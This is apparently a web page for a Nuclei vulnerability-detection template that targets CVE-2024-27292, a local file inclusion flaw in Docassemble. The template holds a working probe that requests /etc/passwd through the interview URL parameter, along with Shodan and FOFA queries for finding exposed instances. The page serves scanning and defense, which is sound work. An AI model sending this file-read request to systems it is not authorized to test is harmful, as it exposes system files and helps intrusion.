Skip to content

Docassemble - Local File Inclusion

ID: CVE-2024-27292

Severity: high

Author: johnk3r

Tags: cve,cve2024,docassemble,lfi

Docassemble is an expert system for guided interviews and document assembly. The vulnerability allows attackers to gain unauthorized access to information on the system through URL manipulation. It affects versions 1.4.53 to 1.4.96. The vulnerability has been patched in version 1.4.97 of the master branch.

id: CVE-2024-27292
info:
name: Docassemble - Local File Inclusion
author: johnk3r
severity: high
description: |
Docassemble is an expert system for guided interviews and document assembly. The vulnerability allows attackers to gain unauthorized access to information on the system through URL manipulation. It affects versions 1.4.53 to 1.4.96. The vulnerability has been patched in version 1.4.97 of the master branch.
reference:
- https://tantosec.com/blog/docassemble/
- https://github.com/jhpyle/docassemble/security/advisories/GHSA-jq57-3w7p-vwvv
- https://github.com/jhpyle/docassemble/commit/97f77dc486a26a22ba804765bfd7058aabd600c9
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2024-27292
cwe-id: CWE-706
epss-score: 0.00043
epss-percentile: 0.0866
metadata:
verified: true
max-request: 1
shodan-query: http.title:"docassemble"
fofa-query: icon_hash="-575790689"
tags: cve,cve2024,docassemble,lfi
http:
- method: GET
path:
- "{{BaseURL}}/interview?i=/etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
- type: status
status:
- 501
# digest: 4a0a00473045022100c068289829ad5cc977f1f5ee8f14ab38f15720bb31fa769e57b191e53e1f04aa022040b6ec542d7cf7ba337eedb17e0f69f302e1cacea0ca7214fbf4fb184ef033fd:922c64590222798bb761d5b6d8e72950

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-27292.yaml"

View on Github